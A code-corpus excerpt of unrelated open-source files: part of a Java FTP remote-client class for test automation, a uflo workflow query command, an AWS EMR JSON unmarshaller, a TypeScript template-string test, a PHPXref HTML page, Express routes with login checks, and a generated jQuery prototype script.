 * to the remote client.<br>
 * The source file path should be relative to the FTP user home directory, not an
 * absolute file path.
 * The destination can be either an absolute path or relative to the client's
 * user directory.<br>
*/
public void copyFileFromLocalMachineToRemoteClient(String source, String destination) throws Exception {
StringBuffer stringbuffer = new StringBuffer("get ");
destination = adjustPath(destination);
stringbuffer.append(source);
stringbuffer.append(" ");
stringbuffer.append(destination);
copyFileViaFTP(stringbuffer.toString());
}
/**
 * Copies all files from the FTP server machine (in most cases the local machine)
 * to the remote client.<br>
 *
 * @param filesPath - String array (String...) of full file paths.<br>
* @throws Exception
*/
public void copyAllFilesFromLocalMachineToLocalRemote(String... filesPath) throws Exception{
copyAllFilesViaFTP("mget ", filesPath);
}
/**
 * Copies a file from the remote client to the FTP server machine (in most cases
 * the local machine).
 *
 * The source file path can be either an absolute path or relative to the client's
 * user directory.
 * The destination should be relative to the FTP user home directory, not an
 * absolute file path.
*/
public void copyFileFromRemoteClientToLocalMachine(String source, String destination) throws Exception {
source = adjustPath(source);
StringBuffer stringbuffer = new StringBuffer("put ");
stringbuffer.append(source);
stringbuffer.append(" ");
stringbuffer.append(destination);
copyFileViaFTP(stringbuffer.toString());
}
/**
 * Copies all files from the remote client to the FTP server machine (in most cases
 * the local machine).<br>
 *
 * @param filesPath - String array (String...) of full file paths.<br>
* @throws Exception
*/
public void copyAllFilesFromRemoteMachineToLocalMachine(String... filesPath) throws Exception{
copyAllFilesViaFTP("mput ", filesPath);
}
private void copyFileViaFTP(String command) throws Exception {
openFTPSession();
setAsciiMode(isAscii());
setPromptMode(isPromptOn());
runCliCommand(command);
}
private void copyAllFilesViaFTP(String command, String... filesPath) throws Exception {
StringBuffer stringBuffer = new StringBuffer(command);
openFTPSession();
setAsciiMode(isAscii());
setPromptMode(isPromptOn());
for(String currentFilePath : filesPath){
String source = adjustPath(currentFilePath);
stringBuffer.append(source);
stringBuffer.append(" ");
}
runCliCommand(stringBuffer.toString());
}
private void runCliCommand(String command) throws Exception{
cli.command(command , 1000 *60 * 5,true,false,null,ftpGeneralPrompts);
if (cli.getResult().indexOf("226") < 0){
throw new Exception("Failed in files transfer");
}
}
/**
* Changes ftp session mode to passive
*/
public void passivate(boolean isPassive) throws Exception {
openFTPSession();
for (int i = 0; i < 2;i++){
cli.command("passive",1000*60,true,false,null,ftpGeneralPrompts);
String result = cli.getResult().toLowerCase();
boolean on = result.indexOf("on") >= 0;
boolean off = result.indexOf("off")>= 0;
boolean notSupported = result.indexOf("invalid")>= 0;
if (notSupported){
throw new Exception("Passivation not supported");
}
if ((isPassive && on) ||(!isPassive && off) ){
break;
}
}
}
/**
* Terminates FTPRemoteClient.
*/
public void close() {
closeFTPSession();
super.close();
}
/**
* Opens FTP session
*/
private void openFTPSession() throws Exception {
initCli();
ftpLogin();
}
/**
*/
private void initCli() throws Exception {
if (cli == null){
if (cliConnection != null){
initCliFromCliConnectionImpl();
return;
}
Prompt p = new Prompt();
p.setPrompt(">");
p.setCommandEnd(true);
cli =
CliFactory.createCli(getHost(),getOperatingSystem(), getProtocol(),getUser(),getPassword(),new Prompt[]{p});
}
}
private void initCliFromCliConnectionImpl() throws Exception{
if (!cliConnection.isConnected()){
cliConnection.connect();
}
cli = (Cli)ReflectionUtils.getField("cli", CliConnectionImpl.class).get(cliConnection);
}
/**
*/
private void closeFtp(){
try {
cli.command("bye", 1000 *2 ,true,false,null,new Prompt[]{new Prompt("bye.",true)});
if (cli.getResult().indexOf("221") < 0){
report.report("Did not find success code 221");
}
}catch (Exception e){
report.report("Could not find prompt after closing session. " + e.getMessage());
}
}
/**
*/
private void closeCli(){
if (cli != null){
try {
if (cliConnection != null){
closeCliConnectionImpl();
}
cli.close();
}catch (Exception e){
report.report("Failed closing telnet connection",e);
}
}
cli=null;
}
private void closeCliConnectionImpl() throws Exception{
if (cliConnection.isConnected()){
cliConnection.disconnect();
}
}
/**
* Starts FTP client and performs login.
*/
private void ftpLogin() throws Exception{
cli.command("");
String result = cli.getResult();
for (String ftpPrompt:promptsToStringArray(ftpGeneralPrompts)){
if (result.indexOf(ftpPrompt) >=0 ){
//we are already logged in
return;
}
}
String serverAddress = getFTPServerAddress();
cli.command("ftp " + serverAddress, 1000*60,true,false,null,ftpLoginPrompts);
if (cli.getResult().indexOf("220") < 0){
throw new Exception("Failed connecting to FTP server.("+serverAddress+"). Please verify that there is a ping between the remote client to the runner machine");
}
cli.command(getFtpUserName(),1000*60,true,false,null,ftpPasswordPrompts);
if (cli.getResult().indexOf("331") < 0){
throw new Exception("Failed in login process");
}
cli.command(getFtpPassword(),1000*60,true,false,null,ftpGeneralPrompts);
if (cli.getResult().indexOf("230") < 0){
throw new Exception("User not authorized to login");
}
}
/**
* Changes ftp session mode (ascii/binary)
*/
private void setAsciiMode(boolean isAscii) throws Exception {
String command = "binary";
if (isAscii){
command="ascii";
}
cli.command(command,1000*60,true,false,null,ftpGeneralPrompts);
if (cli.getResult().indexOf("200") < 0){
throw new Exception("Failed changing to binary mode");
}
}
/**
* Changes the FTP session mode ( on / off )
* @param promptOn
* @throws Exception
*/
private void setPromptMode(boolean promptOn) throws Exception{
String command = "prompt off";
if (promptOn){
command="prompt on";
}
cli.command(command,1000*60,true,false,null,ftpGeneralPrompts);
if (cli.getResult().indexOf("Interactive") < 0){
throw new Exception("Failed changing prompt mode");
}
}
public boolean isPromptOn() {
return promptOn;
}
public void setPromptOn(boolean promptOn) {
this.promptOn = promptOn;
}
/**
* Adjusts file path to operating system.
*/
private String adjustPath(String path) {
if (CliFactory.OPERATING_SYSTEM_WINDOWS.equals(getOperatingSystem())){
String toReturn = FileUtils.convertToWindowsPath(path);
if (!toReturn.startsWith("\"")){
toReturn = "\""+toReturn+"\"";
}
return toReturn;
}else {
return FileUtils.replaceSeparator(path);
}
}
/**
*
*/
private void initPrompts() throws Exception {
String[] defaultFTPPrompts = new String[]{"ftp>"};
String[] defaultLoginPrompts = new String[]{"):"};
String[] defaultPasswordPrompts = new String[]{"for "+getFtpUserName(),"Password:"};
if (!new File(FILE_TRANSFER_PROPERTIES_FILE_NAME).exists()){
ftpGeneralPrompts = stringArrayToPrompts(defaultFTPPrompts);
ftpLoginPrompts = stringArrayToPrompts(defaultLoginPrompts);
ftpPasswordPrompts = stringArrayToPrompts(defaultPasswordPrompts);
return;
}
Properties props = new Properties();
FileInputStream stream = new FileInputStream(FILE_TRANSFER_PROPERTIES_FILE_NAME);
try {
props.load(stream);
}finally{
try{stream.close();}catch(Exception e){};
}
String ftpPrompts = props.getProperty(FTP_PROMPTS);
String[] ftpPromptsAsStringArray = StringUtils.split(ftpPrompts, ";, ");
ftpPromptsAsStringArray = StringUtils.mergeStringArrays(new String[][]{ftpPromptsAsStringArray,defaultFTPPrompts});
ftpGeneralPrompts = stringArrayToPrompts(ftpPromptsAsStringArray);
String _ftpLoginPrompts = props.getProperty(FTP_LOGIN_PROMPTS);
String[] ftpLoginPromptsAsStringArray = StringUtils.split(_ftpLoginPrompts, ";, ");
ftpLoginPromptsAsStringArray = StringUtils.mergeStringArrays(new String[][]{ftpLoginPromptsAsStringArray,defaultLoginPrompts});
ftpLoginPrompts = stringArrayToPrompts(ftpLoginPromptsAsStringArray);
String _ftpPasswordPrompts = props.getProperty(FTP_PASSWORD_PROMPTS);
String[] ftpPasswordPromptsAsStringArray = StringUtils.split(_ftpPasswordPrompts, ";, ");
ftpPasswordPromptsAsStringArray = StringUtils.mergeStringArrays(new String[][]{ftpPasswordPromptsAsStringArray,defaultPasswordPrompts});
ftpPasswordPrompts = stringArrayToPrompts(ftpPasswordPromptsAsStringArray);
}
private String[] promptsToStringArray(Prompt[] prompts){
if (prompts == null){
return new String[0];
}
String[] res = new String[prompts.length];
int i=0;
for (Prompt p:prompts){
res[i]=p.getPrompt();
i++;
}
return res;
}
private Prompt[] stringArrayToPrompts(String[] promptsAsString){
if (promptsAsString == null){
return new Prompt[0];
}
Prompt[] res = new Prompt[promptsAsString.length];
int i=0;
for (String s:promptsAsString){
res[i]=new Prompt(s,false);
res[i].setCommandEnd(true);
i++;
}
return res;
}
private String getFTPServerAddress(){
if (!StringUtils.isEmpty(getFtpServerHostName())){
return getFtpServerHostName();
}
if (!StringUtils.isEmpty(JSystemProperties.getInstance().getPreference(LOCAL_HOST_ADDRESS_PROPERTY))){
return JSystemProperties.getInstance().getPreference(LOCAL_HOST_ADDRESS_PROPERTY);
}
return localMachine.getHostName();
}
/**********************************************************************
* FTPRemoteClient setters and getters
*********************************************************************/
public String getHost() {
return host;
}
public String getOperatingSystem() {
return operatingSystem;
}
public void setOperatingSystem(String operatingSystem) {
this.operatingSystem = operatingSystem;
}
public String getProtocol() {
return protocol;
}
public void setProtocol(String protocol) {
this.protocol = protocol;
}
public void setHost(String remoteHost) {
this.host = remoteHost;
}
public String getPassword() {
return password;
}
public void setPassword(String telnetPassword) {
this.password = telnetPassword;
}
public int getPort() {
return port;
}
public void setPort(int telnetPort) {
this.port = telnetPort;
}
public String getUser() {
return user;
}
public void setUser(String telnetUser) {
this.user = telnetUser;
}
public String getFtpServerHostName() {
return ftpServerHostName;
}
public void setFtpServerHostName(String ftpServerHostName) {
this.ftpServerHostName = ftpServerHostName;
}
public String getFtpUserName() {
return ftpUserName;
}
public void setFtpUserName(String ftpUserName) {
this.ftpUserName = ftpUserName;
}
public String getFtpPassword() {
return ftpPassword;
}
public void setFtpPassword(String ftpPassword) {
this.ftpPassword = ftpPassword;
}
public boolean isAscii() {
return ascii;
}
public void setAscii(boolean ascii) {
this.ascii = ascii;
}
}
| Top-Q/jsystem | jsystem-core-system-objects/FileTransfer-so/src/main/java/com/aqua/filetransfer/ftp/FTPRemoteClient.java | Java | apache-2.0 | 17,775 |
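A minimal usage sketch for the `FTPRemoteClient` above, built only from constructors and methods defined in the file. The host, credentials, and file paths are placeholders, and it assumes the embedded FTP server described in the class javadoc is reachable from the remote machine.

```java
import com.aqua.filetransfer.ftp.FTPRemoteClient;

public class FTPRemoteClientDemo {
    public static void main(String[] args) throws Exception {
        // telnet host, telnet user/password, FTP server address: all placeholders
        FTPRemoteClient client =
            new FTPRemoteClient("10.0.0.5", "telnetUser", "telnetPass", "runner-host");
        client.init();
        try {
            client.setAscii(false);  // transfer in binary mode
            client.copyFileFromLocalMachineToRemoteClient(
                "artifacts/build.zip",     // relative to the FTP user home directory
                "C:\\temp\\build.zip");    // destination on the remote client
        } finally {
            client.closeFTPSession();
            client.close();
        }
    }
}
```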
/*******************************************************************************
* Copyright 2017 Bstek
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not
* use this file except in compliance with the License. You may obtain a copy
* of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* License for the specific language governing permissions and limitations under
* the License.
******************************************************************************/
package com.bstek.uflo.command.impl;
import java.util.List;
import org.hibernate.criterion.Order;
import org.hibernate.criterion.Restrictions;
import com.bstek.uflo.command.Command;
import com.bstek.uflo.env.Context;
import com.bstek.uflo.model.HistoryTask;
/**
* @author Jacky.gao
 * @since September 12, 2013
*/
public class GetListHistoryTasksCommand implements Command<List<HistoryTask>> {
private long processInstanceId;
public GetListHistoryTasksCommand(long processInstanceId) {
this.processInstanceId = processInstanceId;
}
@SuppressWarnings("unchecked")
public List<HistoryTask> execute(Context context) {
return context.getSession().createCriteria(HistoryTask.class)
.add(Restrictions.eq("processInstanceId", processInstanceId))
.addOrder(Order.desc("endDate")).list();
}
}
| youseries/uflo | uflo-core/src/main/java/com/bstek/uflo/command/impl/GetListHistoryTasksCommand.java | Java | apache-2.0 | 1,555 |
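A minimal sketch of executing the command above. It uses only the constructor and `execute(Context)` from the file; how a `com.bstek.uflo.env.Context` is obtained depends on your uflo setup, so it is taken here as a given (an assumption of the sketch).

```java
import java.util.List;

import com.bstek.uflo.command.Command;
import com.bstek.uflo.command.impl.GetListHistoryTasksCommand;
import com.bstek.uflo.env.Context;
import com.bstek.uflo.model.HistoryTask;

public class HistoryTaskQueryDemo {
    // Context acquisition varies by uflo version/configuration (assumed available).
    static List<HistoryTask> historyTasksOf(long processInstanceId, Context context) {
        Command<List<HistoryTask>> cmd = new GetListHistoryTasksCommand(processInstanceId);
        return cmd.execute(context);  // ordered by endDate descending, per the criteria above
    }
}
```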
/*
* Copyright 2012-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
* the License. A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
* and limitations under the License.
*/
package com.amazonaws.services.elasticmapreduce.model.transform;
import java.math.*;
import javax.annotation.Generated;
import com.amazonaws.services.elasticmapreduce.model.*;
import com.amazonaws.transform.SimpleTypeJsonUnmarshallers.*;
import com.amazonaws.transform.*;
import com.fasterxml.jackson.core.JsonToken;
import static com.fasterxml.jackson.core.JsonToken.*;
/**
* DescribeClusterResult JSON Unmarshaller
*/
@Generated("com.amazonaws:aws-java-sdk-code-generator")
public class DescribeClusterResultJsonUnmarshaller implements Unmarshaller<DescribeClusterResult, JsonUnmarshallerContext> {
public DescribeClusterResult unmarshall(JsonUnmarshallerContext context) throws Exception {
DescribeClusterResult describeClusterResult = new DescribeClusterResult();
int originalDepth = context.getCurrentDepth();
String currentParentElement = context.getCurrentParentElement();
int targetDepth = originalDepth + 1;
JsonToken token = context.getCurrentToken();
if (token == null)
token = context.nextToken();
if (token == VALUE_NULL) {
return describeClusterResult;
}
while (true) {
if (token == null)
break;
if (token == FIELD_NAME || token == START_OBJECT) {
if (context.testExpression("Cluster", targetDepth)) {
context.nextToken();
describeClusterResult.setCluster(ClusterJsonUnmarshaller.getInstance().unmarshall(context));
}
} else if (token == END_ARRAY || token == END_OBJECT) {
if (context.getLastParsedParentElement() == null || context.getLastParsedParentElement().equals(currentParentElement)) {
if (context.getCurrentDepth() <= originalDepth)
break;
}
}
token = context.nextToken();
}
return describeClusterResult;
}
private static DescribeClusterResultJsonUnmarshaller instance;
public static DescribeClusterResultJsonUnmarshaller getInstance() {
if (instance == null)
instance = new DescribeClusterResultJsonUnmarshaller();
return instance;
}
}
| dagnir/aws-sdk-java | aws-java-sdk-emr/src/main/java/com/amazonaws/services/elasticmapreduce/model/transform/DescribeClusterResultJsonUnmarshaller.java | Java | apache-2.0 | 2,841 |
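A brief sketch of how the unmarshaller above is reached. In real use the SDK's response handler constructs the `JsonUnmarshallerContext`, so the context parameter is an assumed input here rather than something you would normally build yourself.

```java
import com.amazonaws.services.elasticmapreduce.model.DescribeClusterResult;
import com.amazonaws.services.elasticmapreduce.model.transform.DescribeClusterResultJsonUnmarshaller;
import com.amazonaws.transform.JsonUnmarshallerContext;

public class DescribeClusterUnmarshalDemo {
    // context is normally supplied by the SDK runtime (assumption for this sketch)
    static DescribeClusterResult parse(JsonUnmarshallerContext context) throws Exception {
        return DescribeClusterResultJsonUnmarshaller.getInstance().unmarshall(context);
    }
}
```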
// @target: ES6
var x = 1 % `abc${ 1 }def`; | freedot/tstolua | tests/cases/conformance/es6/templates/templateStringInModuloES6.ts | TypeScript | apache-2.0 | 46 |
<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>PHPXRef 0.7.1 : Unnamed Project : Class Reference: testofauthenticator</title>
<link rel="stylesheet" href="../sample.css" type="text/css">
<link rel="stylesheet" href="../sample-print.css" type="text/css" media="print">
<style id="hilight" type="text/css"></style>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
</head>
<body bgcolor="#ffffff" text="#000000" link="#801800" vlink="#300540" alink="#ffffff">
<table class="pagetitle" width="100%">
<tr>
<td valign="top" class="pagetitle">
[ <a href="../index.html">Index</a> ]
</td>
<td align="right" class="pagetitle">
<h2 style="margin-bottom: 0px">PHP Cross Reference of Unnamed Project</h2>
</td>
</tr>
</table>
<!-- Generated by PHPXref 0.7.1 at Thu Oct 23 18:57:41 2014 -->
<!-- PHPXref (c) 2000-2010 Gareth Watts - [email protected] -->
<!-- http://phpxref.sourceforge.net/ -->
<script src="../phpxref.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript">
<!--
ext='.html';
relbase='../';
subdir='_classes';
filename='index.html';
cookiekey='phpxref';
handleNavFrame(relbase, subdir, filename);
logClass('testofauthenticator');
// -->
</script>
<script language="JavaScript" type="text/javascript">
if (gwGetCookie('xrefnav')=='off')
document.write('<p class="navlinks">[ <a href="javascript:navOn()">Show Explorer<\/a> ]<\/p>');
else
document.write('<p class="navlinks">[ <a href="javascript:navOff()">Hide Explorer<\/a> ]<\/p>');
</script>
<noscript>
<p class="navlinks">
[ <a href="../nav.html" target="_top">Show Explorer</a> ]
[ <a href="index.html" target="_top">Hide Navbar</a> ]
</p>
</noscript>
[<a href="../index.html">Top level directory</a>]<br>
<script language="JavaScript" type="text/javascript">
<!--
document.writeln('<table align="right" class="searchbox-link"><tr><td><a class="searchbox-link" href="javascript:void(0)" onMouseOver="showSearchBox()">Search</a><br>');
document.writeln('<table border="0" cellspacing="0" cellpadding="0" class="searchbox" id="searchbox">');
document.writeln('<tr><td class="searchbox-title">');
document.writeln('<a class="searchbox-title" href="javascript:showSearchPopup()">Search History +</a>');
document.writeln('<\/td><\/tr>');
document.writeln('<tr><td class="searchbox-body" id="searchbox-body">');
document.writeln('<form name="search" style="margin:0px; padding:0px" onSubmit=\'return jump()\'>');
document.writeln('<a class="searchbox-body" href="../_classes/index.html">Class<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="classname"><br>');
document.writeln('<a id="funcsearchlink" class="searchbox-body" href="../_functions/index.html">Function<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="funcname"><br>');
document.writeln('<a class="searchbox-body" href="../_variables/index.html">Variable<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="varname"><br>');
document.writeln('<a class="searchbox-body" href="../_constants/index.html">Constant<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="constname"><br>');
document.writeln('<a class="searchbox-body" href="../_tables/index.html">Table<\/a>: ');
document.writeln('<input type="text" size=10 value="" name="tablename"><br>');
document.writeln('<input type="submit" class="searchbox-button" value="Search">');
document.writeln('<\/form>');
document.writeln('<\/td><\/tr><\/table>');
document.writeln('<\/td><\/tr><\/table>');
// -->
</script>
<div id="search-popup" class="searchpopup"><p id="searchpopup-title" class="searchpopup-title">title</p><div id="searchpopup-body" class="searchpopup-body">Body</div><p class="searchpopup-close"><a href="javascript:gwCloseActive()">[close]</a></p></div>
<h3>Class Cross Reference</h3>
<h2><a href="index.html#testofauthenticator">testofauthenticator</a></h2>
<b>Defined at:</b><ul>
<li><a href="../tests/simpletest/test/authentication_test.php.html#testofauthenticator">/tests/simpletest/test/authentication_test.php</a> -> <a onClick="logClass('testofauthenticator', '/tests/simpletest/test/authentication_test.php.source.html#l89')" href="../tests/simpletest/test/authentication_test.php.source.html#l89"> line 89</a></li>
</ul>
<br><b>No references found.</b><br><br>
</ul>
<!-- A link to the phpxref site in your customized footer file is appreciated ;-) -->
<br><hr>
<table width="100%">
<tr><td>Generated: Thu Oct 23 18:57:41 2014</td>
<td align="right"><i>Cross-referenced by <a href="http://phpxref.sourceforge.net/">PHPXref 0.7.1</a></i></td>
</tr>
</table>
</body></html>
| inputx/code-ref-doc | bonfire/_classes/testofauthenticator.html | HTML | apache-2.0 | 4,769 |
/**
* App routes.
*/
var homepage = require('./homepage');
var user = require('./user');
var news = require('./news');
var test = require('./test');
var passport = require('passport');
function ensureAuthenticated(req, res, next) {
if (req.isAuthenticated()) { return next(); }
req.flash('error', '抱歉,您尚未登录。');
return res.redirect('/user/signin?redirect=' + req.path);
}
function ensureAdmin(req, res, next) {
if (req.isAuthenticated() && req.user.isadmin) { return next(); }
req.flash('error', '抱歉,您不是管理员。');
return res.redirect('/user/signin?redirect=' + req.path);
}
function ensurePermission(req, res, next) {
if (req.isAuthenticated() && req.user.isadmin)
{ return next(); }
if (req.isAuthenticated() &&
req.user.username == req.params.id)
{ return next(); }
req.flash('error', '抱歉,您没有权限。');
return res.redirect('/user/signin?redirect=' + req.path);
}
module.exports = function(app) {
app.get('/', homepage.index);
app.get('/user', ensureAdmin, user.showList);
app.get('/user/page/:page(\\d+)', ensureAdmin, user.showList);
app.get('/user/register', user.showRegister);
app.post('/user/register', user.doRegister);
app.get('/user/signin', user.showSignin);
app.post('/user/signin', passport.authenticate('local',
{ successRedirect: '/',
successFlash: '登录成功,欢迎回来。',
failureRedirect: 'back',
failureFlash: '抱歉,手机号或密码错误。',
}));
app.get('/user/signout', user.doSignout);
app.get('/user/:id(\\d{8,13})/edit', ensurePermission, user.showEditUser);
app.post('/user/:id(\\d{8,13})/edit', ensurePermission, user.doEditUser);
app.get('/user/:id(\\d{8,13})/setadmin', ensureAdmin, user.setAdmin);
app.get('/news', news.showList);
app.get('/news/page/:page(\\d+)', news.showList);
app.get('/news/:id(\\d+)', news.showItem);
app.get('/news/:id(\\d+)/edit', ensureAdmin, news.showEditItem);
app.post('/news/:id(\\d+)/edit', ensureAdmin, news.doEditItem);
app.get('/news/:id(\\d+)/delete', ensureAdmin, news.doDeleteItem);
app.get('/news/post', ensureAdmin, news.showNewItem);
app.post('/news/post', ensureAdmin, news.doNewItem);
app.get('/test', test);
app.get('*', function(req, res){
return res.render('homepage', {title: '404'});
});
}
| dotkrnl/helium | routes/index.js | JavaScript | apache-2.0 | 2,456 |
jQuery("#simulation")
.on("click", ".s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d .click", function(event, data) {
var jEvent, jFirer, cases;
if(data === undefined) { data = event; }
jEvent = jimEvent(event);
jFirer = jEvent.getEventFirer();
if(jFirer.is("#s-Label_58")) {
cases = [
{
"blocks": [
{
"actions": [
{
"action": "jimChangeStyle",
"parameter": [ {
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58": {
"attributes": {
"font-size": "12.0pt",
"font-family": "Roboto-Regular,Arial"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58 .valign": {
"attributes": {
"vertical-align": "middle",
"text-align": "left"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58 span": {
"attributes": {
"color": "#80B8F1",
"text-align": "left",
"text-decoration": "none",
"font-family": "Roboto-Regular,Arial",
"font-size": "12.0pt"
}
}
} ],
"exectype": "serial",
"delay": 0
},
{
"action": "jimChangeStyle",
"parameter": [ {
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59": {
"attributes": {
"font-size": "20.0pt",
"font-family": "IOS8-Icons-Regular,Arial"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59 .valign": {
"attributes": {
"vertical-align": "middle",
"text-align": "left"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59 span": {
"attributes": {
"color": "#80B8F1",
"text-align": "left",
"text-decoration": "none",
"font-family": "IOS8-Icons-Regular,Arial",
"font-size": "20.0pt"
}
}
} ],
"exectype": "serial",
"delay": 0
},
{
"action": "jimPause",
"parameter": {
"pause": 300
},
"exectype": "serial",
"delay": 0
},
{
"action": "jimChangeStyle",
"parameter": [ {
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58": {
"attributes": {
"font-size": "12.0pt",
"font-family": "Roboto-Regular,Arial"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58 .valign": {
"attributes": {
"vertical-align": "middle",
"text-align": "left"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_58 span": {
"attributes": {
"color": "#007DFF",
"text-align": "left",
"text-decoration": "none",
"font-family": "Roboto-Regular,Arial",
"font-size": "12.0pt"
}
}
} ],
"exectype": "serial",
"delay": 0
},
{
"action": "jimChangeStyle",
"parameter": [ {
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59": {
"attributes": {
"font-size": "20.0pt",
"font-family": "IOS8-Icons-Regular,Arial"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59 .valign": {
"attributes": {
"vertical-align": "middle",
"text-align": "left"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Label_59 span": {
"attributes": {
"color": "#157EFB",
"text-align": "left",
"text-decoration": "none",
"font-family": "IOS8-Icons-Regular,Arial",
"font-size": "20.0pt"
}
}
} ],
"exectype": "serial",
"delay": 0
}
]
}
],
"exectype": "serial",
"delay": 0
}
];
event.data = data;
jEvent.launchCases(cases);
} else if(jFirer.is("#s-cover")) {
cases = [
{
"blocks": [
{
"actions": [
{
"action": "jimChangeStyle",
"parameter": [ {
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": {
"attributes": {
"opacity": "0.75"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": {
"attributes-ie": {
"-ms-filter": "progid:DXImageTransform.Microsoft.Alpha(Opacity=75)",
"filter": "alpha(opacity=75)"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": {
"attributes-ie8lte": {
"-ms-filter": "progid:DXImageTransform.Microsoft.Alpha(Opacity=75)",
"filter": "alpha(opacity=75)"
}
}
} ],
"exectype": "serial",
"delay": 0
},
{
"action": "jimPause",
"parameter": {
"pause": 300
},
"exectype": "serial",
"delay": 0
},
{
"action": "jimChangeStyle",
"parameter": [ {
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": {
"attributes": {
"opacity": "1.0"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": {
"attributes-ie": {
"-ms-filter": "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)",
"filter": "alpha(opacity=100)"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-cover": {
"attributes-ie8lte": {
"-ms-filter": "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)",
"filter": "alpha(opacity=100)"
}
}
} ],
"exectype": "serial",
"delay": 0
}
]
}
],
"exectype": "serial",
"delay": 0
}
];
event.data = data;
jEvent.launchCases(cases);
} else if(jFirer.is("#s-Hotspot_1")) {
cases = [
{
"blocks": [
{
"actions": [
{
"action": "jimNavigation",
"parameter": {
"target": "screens/6709a53d-60b3-4498-bf73-977706fff4da"
},
"exectype": "serial",
"delay": 0
}
]
}
],
"exectype": "serial",
"delay": 0
}
];
event.data = data;
jEvent.launchCases(cases);
} else if(jFirer.is("#s-Hotspot_3")) {
cases = [
{
"blocks": [
{
"actions": [
{
"action": "jimNavigation",
"parameter": {
"target": "screens/27852e19-fc20-4cac-8d96-13d00ac70f75"
},
"exectype": "serial",
"delay": 0
}
]
}
],
"exectype": "serial",
"delay": 0
}
];
event.data = data;
jEvent.launchCases(cases);
} else if(jFirer.is("#s-Button_1")) {
cases = [
{
"blocks": [
{
"actions": [
{
"action": "jimChangeStyle",
"parameter": [ {
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1": {
"attributes": {
"font-size": "12.0pt",
"font-family": "Roboto-Regular,Arial"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1 .valign": {
"attributes": {
"vertical-align": "middle",
"text-align": "center"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1 span": {
"attributes": {
"color": "#80B8F1",
"text-align": "center",
"text-decoration": "none",
"font-family": "Roboto-Regular,Arial",
"font-size": "12.0pt"
}
}
} ],
"exectype": "serial",
"delay": 0
},
{
"action": "jimPause",
"parameter": {
"pause": 300
},
"exectype": "serial",
"delay": 0
},
{
"action": "jimChangeStyle",
"parameter": [ {
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1": {
"attributes": {
"font-size": "12.0pt",
"font-family": "Roboto-Regular,Arial"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1 .valign": {
"attributes": {
"vertical-align": "middle",
"text-align": "center"
}
}
},{
"#s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d #s-Button_1 span": {
"attributes": {
"color": "#007DFF",
"text-align": "center",
"text-decoration": "none",
"font-family": "Roboto-Regular,Arial",
"font-size": "12.0pt"
}
}
} ],
"exectype": "serial",
"delay": 0
}
]
}
],
"exectype": "serial",
"delay": 0
}
];
event.data = data;
jEvent.launchCases(cases);
}
})
.on("pageload", ".s-cd8b0318-8942-4a64-b2c9-ee7c253d6b7d .pageload", function(event, data) {
var jEvent, jFirer, cases;
if(data === undefined) { data = event; }
jEvent = jimEvent(event);
jFirer = jEvent.getEventFirer();
if(jFirer.is("#s-Label_35")) {
cases = [
{
"blocks": [
{
"actions": [
{
"action": "jimSetValue",
"parameter": {
"target": "#s-Label_35",
"value": {
"action": "jimConcat",
"parameter": [ {
"action": "jimSubstring",
"parameter": [ {
"action": "jimSystemTime"
},"0","5" ]
}," PM" ]
}
},
"exectype": "serial",
"delay": 0
}
]
}
],
"exectype": "serial",
"delay": 0
}
];
event.data = data;
jEvent.launchCases(cases);
}
